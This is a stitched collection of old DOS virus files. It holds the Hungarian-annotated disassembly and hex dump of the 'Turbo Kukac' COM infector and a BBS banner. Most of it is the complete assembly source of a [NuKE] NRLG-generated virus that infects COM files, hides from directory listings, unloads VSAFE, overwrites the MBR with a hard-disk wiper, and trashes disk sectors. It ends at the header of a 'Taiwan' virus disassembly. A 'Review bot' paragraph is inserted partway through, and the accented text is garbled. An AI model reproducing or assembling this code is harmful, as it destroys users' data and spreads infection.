28F8:02DE 2020 AND [BX+SI],AH
|
||||
28F8:02E0 2020 AND [BX+SI],AH
|
||||
28F8:02E2 2024 AND [SI],AH
|
||||
28F8:02E4 0000 ADD [BX+SI],AL
|
||||
|
||||
28F8:02FC 0000 ADD [BX+SI],AL
|
||||
28F8:02FE FA CLI
|
||||
28F8:02FF 00C7 ADD BH,AL
|
||||
|
||||
Megjegyz‚s:
|
||||
|
||||
Nagyon primitˇv virus, de megvan a maga zsenialit sa, k‚t legyet
|
||||
<09>t egy csap sra, pl COPY parancs eset‚n megnyit egy com file-t,s
|
||||
ha a virus a mem˘ri ban van, akkor m‚g a m soland˘ file-t megfer-
|
||||
t”zi, s a COPY m r a fert”z”tt file-t m solja! Nem igaz n k r-
|
||||
t‚kony vˇrus, puszt n minden<65>tt ott akar lenni, s nehezˇteni a
|
||||
felhaszn l˘(k) munk j t! M‚rete nagyon kicsi, mind”ssze 512 byte!
|
||||
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
|
||||
ban fellelhet” ellen”rz‚sek, gondolok itt arra, hogy ha megt”rt‚nik
|
||||
egy file-ba (hoz) val˘ kiˇr s nem ellen”rzi a program hogy val˘ban
|
||||
kiˇrta-e azt az X byte-ot. Tov bb mikor rezidess‚ (nem {hivatalo-
|
||||
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
|
||||
l‚v” RAM tetej‚nek a paragrafus cˇm‚tt a saj t maga lltal lefog-
|
||||
lalt m‚rettel (kivon s!), mint PL. a Yankee Doodle! A Yankee m‚g
|
||||
azt is megn‚zi, hogy amit meg akar fert”zni az az utols˘ mem˘.
|
||||
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
|
||||
odaadja a teljes szabad mem˘ri t, ami van...
|
||||
|
||||
|
||||
DUMP:
|
||||
|
||||
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
|
||||
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
|
||||
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
|
||||
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
|
||||
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
|
||||
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
|
||||
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
|
||||
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
|
||||
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
|
||||
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
|
||||
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
|
||||
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
|
||||
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
|
||||
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
|
||||
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
|
||||
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
|
||||
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
|
||||
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
|
||||
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
|
||||
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
|
||||
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
|
||||
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
|
||||
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
|
||||
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
|
||||
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
|
||||
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
|
||||
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
|
||||
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
|
||||
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
|
||||
|
||||
;Kiˇrand˘ sz”veg kezdete
|
||||
28F8:02C0 54 75 Tu
|
||||
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
|
||||
28F8:02E0 20 20 20 24 $
|
||||
|
||||
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
|
||||
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
|
||||
28F8:0300 C7 .
|
||||
|
||||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
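Review bot: The listing carries no English summary of the behaviour an analyst would verify against it, and the Hungarian commentary that holds that information (the MCB notes beside 28F8:0143 and the `Megjegyz‚s:` paragraph before the DUMP) is mojibake, presumably a DOS code page (CP852 or CP437) read as Latin-1, so a first line such as `; Comments are Hungarian; original encoding appears to be a DOS code page (CP852?) - confirm before re-saving` would keep them recoverable. A short header comment would also let readers check the dump without decoding the comments: the code tests for a resident copy through the INT 21h vector segment (`CMP AX,4000`), shrinks its own MCB by 41h paragraphs so memory maps do not show it, copies 200h bytes below the top of memory and hooks INT 21h (only AH=3Dh open) and INT 05h, only touches `.COM` files under FE00h bytes that do not already carry the marker byte 05h at host offset 3, and the INT 05h handler loops printing `Turbo Kukac 9.9` through the saved INT 21h vector. Two comments in the listing disagree with the bytes next to them and are worth correcting in that header: `JMP FAR [02C5]` at 28F8:0168 is described as jumping to offset `01c6` while the value stored at 02C5 is `016C`, and the first DUMP line of the message text (`28F8:02C0 54 75`) is labelled 02C0 although the disassembly places the string at 02CE.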
|
|
@ -0,0 +1,590 @@
|
|||
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||||
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
|
||||
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
|
||||
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
|
||||
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
|
||||
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
|
||||
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||||
|
||||
.286
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
org 100h
|
||||
|
||||
start: CALL NEXT
|
||||
|
||||
NEXT:
|
||||
mov di,sp ;take the stack pointer location
|
||||
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
|
||||
sub bp,offset next ;subtract the large code off this code
|
||||
;
|
||||
;*******************************************************************
|
||||
; #1 DECRYPT ROUTINE
|
||||
;*******************************************************************
|
||||
|
||||
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
|
||||
je crypt2 ;yes! not decrypt
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt]+ bp ;di = first byte to decrypt
|
||||
mov dx,1 ;dx = value for decrypt
|
||||
;----------------------------------------------------------
|
||||
deci: ;deci = fuck label!
|
||||
;----------------------------------------------------------
|
||||
|
||||
ÿinc di
|
||||
inc di
|
||||
;----------------------------------------------------------
|
||||
jmp bye ;######## BYE BYE F-PROT ! ##########
|
||||
mov ah,4ch
|
||||
int 21h
|
||||
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
|
||||
;-----------------------------------------------------------
|
||||
mov ah,0bh ;######### BYE BYE TBAV ! ##########
|
||||
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
|
||||
;----------------------------------------------------------
|
||||
loop deci ;repeat please!
|
||||
;
|
||||
;*****************************************************************
|
||||
; #2 DECRYPT ROUTINE
|
||||
;*****************************************************************
|
||||
;
|
||||
crypt: ;fuck label!
|
||||
;
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt2] + bp ;di = first byte to decrypt
|
||||
;---------------------------------------------------------------
|
||||
deci2: ;
|
||||
xor byte ptr cs:[di],1 ;decrytion rutine
|
||||
inc di ;very simple...
|
||||
loop deci2 ;
|
||||
;---------------------------------------------------------------
|
||||
crypt2: ;fuck label!
|
||||
;
|
||||
MOV AX,0CACAH ;call to my resident interrup mask
|
||||
INT 21H ;for chek "I'm is residet?"
|
||||
CMP Bh,0CAH ;is equal to CACA?
|
||||
JE PUM2 ;yes! jump to runnig program
|
||||
call action
|
||||
;*****************************************************************
|
||||
; NRLG FUNCTIONS (SELECTABLE)
|
||||
;*****************************************************************
|
||||
|
||||
ÿcall MBR
|
||||
call TRASH_RN
|
||||
call ANTI_V
|
||||
;****************************************************************
|
||||
; PROCESS TO REMAIN RESIDENT
|
||||
;****************************************************************
|
||||
|
||||
mov ax,3521h
|
||||
int 21h ;store the int 21 vectors
|
||||
mov word ptr [bp+int21],bx ;in cs:int21
|
||||
mov word ptr [bp+int21+2],es ;
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ax ;ax = my actual segment
|
||||
dec ax ;dec my segment for look my MCB
|
||||
mov es,ax ;
|
||||
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop es ;
|
||||
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
|
||||
sub bx,17 + offset fin ;and 100H for the PSP total
|
||||
mov ah,4ah ;used memory
|
||||
int 21h ;put the new value to MCB
|
||||
;---------------------------------------------------------------
|
||||
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
|
||||
mov ah,48h ;
|
||||
int 21h ;request the memory to fuck DOS!
|
||||
;---------------------------------------------------------------
|
||||
dec ax ;ax=new segment
|
||||
mov es,ax ;ax-1= new segment MCB
|
||||
mov byte ptr es:[1],8 ;put '8' in the segment
|
||||
;--------------------------------------------------------------
|
||||
inc ax ;
|
||||
mov es,ax ;es = new segment
|
||||
lea si,[bp + offset start] ;si = start of virus
|
||||
mov di,100h ;di = 100H (psp position)
|
||||
mov cx,offset fin - start ;cx = lag of virus
|
||||
push cs ;
|
||||
pop ds ;ds = cs
|
||||
cld ;mov the code
|
||||
rep movsb ;ds:si >> es:di
|
||||
;--------------------------------------------------------------
|
||||
mov dx,offset virus ;dx = new int21 handler
|
||||
mov ax,2521h ;
|
||||
push es ;
|
||||
pop ds ;
|
||||
int 21h ;set the vectors
|
||||
;-------------------------------------------------------------
|
||||
pum2: ;
|
||||
;
|
||||
mov ah,byte ptr [cs:bp + real] ;restore the 3
|
||||
mov byte ptr cs:[100h],ah ;first bytes
|
||||
mov ax,word ptr [cs:bp + real + 1] ;
|
||||
mov word ptr cs:[101h],ax ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,100h ;
|
||||
jmp ax ;jmp to execute
|
||||
;
|
||||
;*****************************************************************
|
||||
;* HANDLER FOR THE INT 21H
|
||||
;*****************************************************************
|
||||
;
|
||||
VIRUS: ;
|
||||
;
|
||||
cmp ah,4bh ;is a 4b function?
|
||||
je REPRODUCCION ;yes! jump to reproduce !
|
||||
cmp ah,11h
|
||||
je dir
|
||||
cmp ah,12h
|
||||
je dir
|
||||
dirsal:
|
||||
cmp AX,0CACAH ;is ... a caca function? (resident chek)
|
||||
jne a3 ;no! jump to a3
|
||||
mov bh,0cah ;yes! put ca in bh
|
||||
a3: ;
|
||||
JMP dword ptr CS:[INT21] ;jmp to original int 21h
|
||||
ret ;
|
||||
make db '[NuKE] N.R.L.G. AZRAEL'
|
||||
dir:
|
||||
jmp dir_s
|
||||
;-------------------------------------------------------------
|
||||
REPRODUCCION: ;
|
||||
;
|
||||
pushf ;put the register
|
||||
pusha ;in the stack
|
||||
push si ;
|
||||
push di ;
|
||||
push bp ;
|
||||
push es ;
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ax,3524H ;get the dos error control
|
||||
int 21h ;interupt
|
||||
mov word ptr error,es ;and put in cs:error
|
||||
mov word ptr error+2,bx ;
|
||||
mov ax,2524H ;change the dos error control
|
||||
mov dx,offset all ;for my "trap mask"
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the registers
|
||||
pop bp ;
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;-------------------------------------------------------------
|
||||
pushf ;put the registers
|
||||
pusha ;
|
||||
push si ;HEY! AZRAEL IS CRAZY?
|
||||
push di ;PUSH, POP, PUSH, POP
|
||||
push bp ;PLEEEEEAAAAAASEEEEEEEEE
|
||||
push es ;PURIFY THIS SHIT!
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4300h ;
|
||||
int 21h ;get the file
|
||||
mov word ptr cs:[attrib],cx ;atributes
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4301h ;le saco los atributos al
|
||||
xor cx,cx ;file
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,3d02h ;open the file
|
||||
int 21h ;for read/write
|
||||
mov bx,ax ;bx=handle
|
||||
;-------------------------------------------------------------
|
||||
mov ax,5700h ;
|
||||
int 21h ;get the file date
|
||||
mov word ptr cs:[hora],cx ;put the hour
|
||||
mov word ptr cs:[dia],dx ;put the day
|
||||
and cx,word ptr cs:[fecha] ;calculate the seconds
|
||||
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
|
||||
jne seguir ;yes! the file is infected!
|
||||
jmp cerrar ;
|
||||
;------------------------------------------------------------
|
||||
seguir: ;
|
||||
mov ax,4202h ;move the pointer to end
|
||||
call movedor ;of the file
|
||||
;------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
sub ax,3 ;calculate the
|
||||
mov word ptr [cs:largo],ax ;jmp long
|
||||
;-------------------------------------------------------------
|
||||
mov ax,04200h ;move the pointer to
|
||||
call movedor ;start of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;read the 3 first bytes
|
||||
mov ah,3fh ;
|
||||
mov cx,3 ;
|
||||
lea dx,[cs:real] ;put the bytes in cs:[real]
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
|
||||
jne er1 ;yes! is a EXE... fuckkk!
|
||||
;----------------------------------------------------------
|
||||
jmp cerrar
|
||||
er1:
|
||||
;----------------------------------------------------------
|
||||
mov ax,4200h ;move the pointer
|
||||
call movedor ;to start fo file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ah,40h ;
|
||||
mov cx,1 ;write the JMP
|
||||
lea dx,[cs:jump] ;instruccion in the
|
||||
int 21h ;fist byte of the file
|
||||
;----------------------------------------------------------
|
||||
mov ah,40h ;write the value of jmp
|
||||
mov cx,2 ;in the file
|
||||
lea dx,[cs:largo] ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,04202h ;move the pointer to
|
||||
call movedor ;end of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;move the code
|
||||
push cs ;of my virus
|
||||
pop es ;to cs:end+50
|
||||
cld ;for encrypt
|
||||
mov si,100h ;
|
||||
mov di,offset fin + 50 ;
|
||||
mov cx,offset fin - 100h ;
|
||||
rep movsb ;
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
|
||||
enc: ;
|
||||
xor byte ptr cs:[di],1 ;encrypt the virus
|
||||
inc di ;code
|
||||
loop enc ;
|
||||
;---------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
|
||||
mov dx,1
|
||||
enc2: ;
|
||||
|
||||
ÿinc di
|
||||
inc di ;the virus code
|
||||
loop enc2 ;
|
||||
;--------------------------------------------
|
||||
mov ah,40h ;
|
||||
mov cx,offset fin - offset start ;copy the virus
|
||||
mov dx,offset fin + 50 ;to end of file
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cerrar: ;
|
||||
;restore the
|
||||
mov ax,5701h ;date and time
|
||||
mov cx,word ptr cs:[hora] ;file
|
||||
mov dx,word ptr cs:[dia] ;
|
||||
or cx,word ptr cs:[fecha] ;and mark the seconds
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ah,3eh ;
|
||||
int 21h ;close the file
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the
|
||||
pop bp ;registers
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
pusha ;
|
||||
;
|
||||
mov ax,4301h ;restores the atributes
|
||||
mov cx,word ptr cs:[attrib] ;of the file
|
||||
int 21h ;
|
||||
;
|
||||
popa ;
|
||||
;----------------------------------------------------------
|
||||
pushf ;
|
||||
pusha ; 8-( = f-prot
|
||||
push si ;
|
||||
push di ; 8-( = tbav
|
||||
push bp ;
|
||||
push es ; 8-) = I'm
|
||||
push ds ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,2524H ;
|
||||
lea bx,error ;restore the
|
||||
mov ds,bx ;errors handler
|
||||
lea bx,error+2 ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;
|
||||
pop bp ;restore the
|
||||
pop di ;resgisters
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
JMP A3 ;jmp to orig. INT 21
|
||||
;
|
||||
;**********************************************************
|
||||
; SUBRUTINES AREA
|
||||
;**********************************************************
|
||||
;
|
||||
movedor: ;
|
||||
;
|
||||
xor cx,cx ;use to move file pointer
|
||||
xor dx,dx ;
|
||||
int 21h ;
|
||||
ret ;
|
||||
;----------------------------------------------------------
|
||||
all: ;
|
||||
;
|
||||
XOR AL,AL ;use to set
|
||||
iret ;error flag
|
||||
|
||||
;***********************************************************
|
||||
; DATA AREA
|
||||
;***********************************************************
|
||||
largo dw ?
|
||||
jump db 0e9h
|
||||
real db 0cdh,20h,0
|
||||
hora dw ?
|
||||
dia dw ?
|
||||
attrib dw ?
|
||||
int21 dd ?
|
||||
error dd ?
|
||||
|
||||
ÿ;---------------------------------
|
||||
action: ;
|
||||
MOV AH,2AH ;
|
||||
INT 21H ;get date
|
||||
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
|
||||
JE cont ;nop! fuck ret
|
||||
cmp byte ptr cs:[action_dia+bp],32 ;
|
||||
jne no_day ;
|
||||
cont: ;
|
||||
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
|
||||
je set ;
|
||||
cmp byte ptr cs:[action_mes+bp],13 ;
|
||||
jne NO_DAY ;nop! fuck ret
|
||||
set: ;
|
||||
|
||||
mov ax,351ch ;
|
||||
int 21h ;store the int 1ch vectors
|
||||
mov word ptr [trampaint+bp],bx ;in cs:trampaint
|
||||
mov word ptr [trampaint+2+bp],es ;
|
||||
mov ax,251ch ;put the int 1ch (clock) vector
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov dx,offset tardar ;in offset tardar
|
||||
int 21h ;
|
||||
mov dx,offset fin ;
|
||||
int 27h ;main resident the code
|
||||
NO_DAY: ;
|
||||
ret ;ret for program
|
||||
tardar: ;int 1c handler
|
||||
pushf ;
|
||||
pusha ;
|
||||
mov cx,0ffffh ;fuck loop for slow speed
|
||||
trampa: ;
|
||||
mov ax,ax ;
|
||||
loop trampa ;
|
||||
popa ;
|
||||
popf ;
|
||||
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
|
||||
ret ;
|
||||
trampaint dd ? ;
|
||||
;--------------------------------;
|
||||
|
||||
ÿMBR:
|
||||
;**************************************
|
||||
; Start of MBR-BOMB writing
|
||||
;**************************************
|
||||
mov ax,9f80h ;very high memory
|
||||
mov es,ax ;good for buffer
|
||||
mov ax,0201h ;read the original
|
||||
mov cx,0001h ;MBR of the disk
|
||||
mov dx,0080h ;
|
||||
xor bx,bx ;to buffer 9f80:0000h
|
||||
int 13h ;
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ax,9f80h ;add my MBR-BOMB
|
||||
mov es,ax ;to real MBR in my
|
||||
mov si,offset fat ;buffer
|
||||
xor di,di ;
|
||||
mov cx,105 ;ds:[fat]=>9f80:0000h
|
||||
repe movsb ;total 105bytes
|
||||
mov ax,9f80h ;
|
||||
mov es,ax ;
|
||||
xor bx,bx ;replace the original
|
||||
mov ax,0301h ;MBR in the disk by the
|
||||
xor ch,ch ;new MBR-BOMB.
|
||||
mov dx,0080h ;
|
||||
mov cl,1 ;WARNING! VSAFE/MSAVE
|
||||
mov bx,0 ;NOTIFY THIS ACTION
|
||||
int 13h ;
|
||||
ret ;
|
||||
;---------------------------------------------------
|
||||
;*********************
|
||||
; Start of MBR code
|
||||
;*********************
|
||||
fat: ;
|
||||
cli ;#
|
||||
xor ax,ax ;#
|
||||
mov ss,ax ;#
|
||||
mov sp,7C00h ;#
|
||||
mov si,sp ;#
|
||||
push ax ;#
|
||||
pop es ;#
|
||||
push ax ;#
|
||||
pop ds ;#
|
||||
sti ;#
|
||||
;#
|
||||
pushf ;#
|
||||
push ax ;#
|
||||
push cx ;# = This code be in the
|
||||
push dx ;# original MBR
|
||||
push ds ;# (NOT MODIFY)
|
||||
push es ;#
|
||||
MOV AH,04H ; Read real tyme
|
||||
INT 1AH ; Clock
|
||||
CMP DH,cs:byte ptr action_mes ; is Month?
|
||||
JE CAGO ; yes! SNIF SNIF HD.
|
||||
lit:
|
||||
pop es
|
||||
pop ds
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
popf
|
||||
jmp booti
|
||||
CAGO:
|
||||
;++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
; START OF YOUR DESTRUCTIVE CODE (or not destructive)
|
||||
;++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
rip_hd:
|
||||
;@
|
||||
xor dx, dx ;@
|
||||
rip_hd1: ;@
|
||||
mov cx, 2 ;@
|
||||
mov ax, 311h ;@
|
||||
mov dl, 80h ;@
|
||||
mov bx, 5000h ;@
|
||||
mov es, bx ;@
|
||||
int 13h ;@
|
||||
jae rip_hd2 ;@
|
||||
xor ah, ah ;@
|
||||
int 13h ;@
|
||||
rip_hd2: ;@
|
||||
inc dh ;@
|
||||
cmp dh, 4 ;@
|
||||
jb rip_hd1 ;@
|
||||
inc ch ;@
|
||||
jmp rip_hd
|
||||
|
||||
;+++++++++++++++++++++++++++++++++++++++++++
|
||||
; END OF YOUR DESTRUCUTIVE CODE
|
||||
;+++++++++++++++++++++++++++++++++++++++++++
|
||||
booti:
|
||||
xor ax,ax ;#
|
||||
mov es,ax ;#
|
||||
mov bx,7c00h ;#
|
||||
mov ah,02 ;#
|
||||
mov al,1 ;#
|
||||
mov cl,1 ;# #= This code be
|
||||
mov ch,0 ;# in the original
|
||||
mov dh,1 ;# MBR
|
||||
mov dl,80h ;# (NOT MODIFY)
|
||||
;#
|
||||
int 13h ;#
|
||||
;#
|
||||
db 0eah,00,7ch,00,00 ;#
|
||||
;*******************
|
||||
; END OF MBR CODE
|
||||
;*******************
|
||||
|
||||
ÿ;---------------------------------
|
||||
TRASH_RN: ;
|
||||
MOV AH,2DH ;
|
||||
INT 21H ;get date
|
||||
CMP Dl,6 ;is =6 (RAN 0-99)
|
||||
jne NO_DAYY ;nop! fuck ret
|
||||
mov ah,0dh ;
|
||||
int 21h ;reset disk
|
||||
mov al,2 ;
|
||||
mov cx,0ffffh ;
|
||||
mov dx,0 ;
|
||||
int 26h ;fuck ffffh sector
|
||||
mov ah,0dh ;reste disk
|
||||
int 21h ;
|
||||
mov al,2 ;
|
||||
mov cx,0ffffh ;
|
||||
mov dx,0ffffh ;new fuck+
|
||||
int 26h ;heheheh!!!
|
||||
NO_DAYY: ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
ÿ;---------------------------------
|
||||
ANTI_V: ;
|
||||
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
|
||||
MOV DX,5945H ;
|
||||
INT 21H ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
|
||||
ÿ;*****************************************************
|
||||
dir_s:
|
||||
pushf
|
||||
push cs
|
||||
call a3 ;Get file Stats
|
||||
test al,al ;Good FCB?
|
||||
jnz no_good ;nope
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,51h ;Is this Undocmented? huh...
|
||||
int 21h
|
||||
mov es,bx
|
||||
cmp bx,es:[16h]
|
||||
jnz not_infected
|
||||
mov bx,dx
|
||||
mov al,[bx]
|
||||
push ax
|
||||
mov ah,2fh ;Get file DTA
|
||||
int 21h
|
||||
pop ax
|
||||
inc al
|
||||
jnz fcb_okay
|
||||
add bx,7h
|
||||
fcb_okay: mov ax,es:[bx+17h]
|
||||
and ax,1fh ;UnMask Seconds Field
|
||||
xor al,byte ptr cs:fechad
|
||||
jnz not_infected
|
||||
and byte ptr es:[bx+17h],0e0h
|
||||
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
|
||||
sbb es:[bx+1fh],ax
|
||||
not_infected:pop es
|
||||
pop bx
|
||||
pop ax
|
||||
no_good: iret
|
||||
;********************************************************************
|
||||
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
|
||||
;*********************************************************************
|
||||
|
||||
ÿaction_dia Db 01H ;day for the action
|
||||
action_mes Db 01H ;month for the action
|
||||
FECHA DW 01eH ;Secon for mark
|
||||
FECHAd Db 01eH ;Secon for mark dir st
|
||||
fin:
|
||||
code ends
|
||||
end start
@ -0,0 +1,407 @@
|
||||
PAGE 60,132
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Progrming Research Group T.R.A.U.M.A. º
|
||||
; º Universidade Autonoma de Lisboa º
|
||||
; º The 'Taiwan' Virus º
|
||||
; º Disassembled by J.L. and J.C, Feb 1990 º
|
||||
; º º
|
||||
; º Not Copyrighted (c) Jean Luz. º
|
||||
; º º
|
||||
; º This listing is only to be made available to TRAUMA researchers º
|
||||
; º º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.1
|
||||
|
||||
data_1e equ 58h ; (0000:0058=0A9Ch)
|
||||
data_2e equ 5Ah ; (0000:005A=0D81h)
|
||||
data_3e equ 475h ; (0000:0475=2)
|
||||
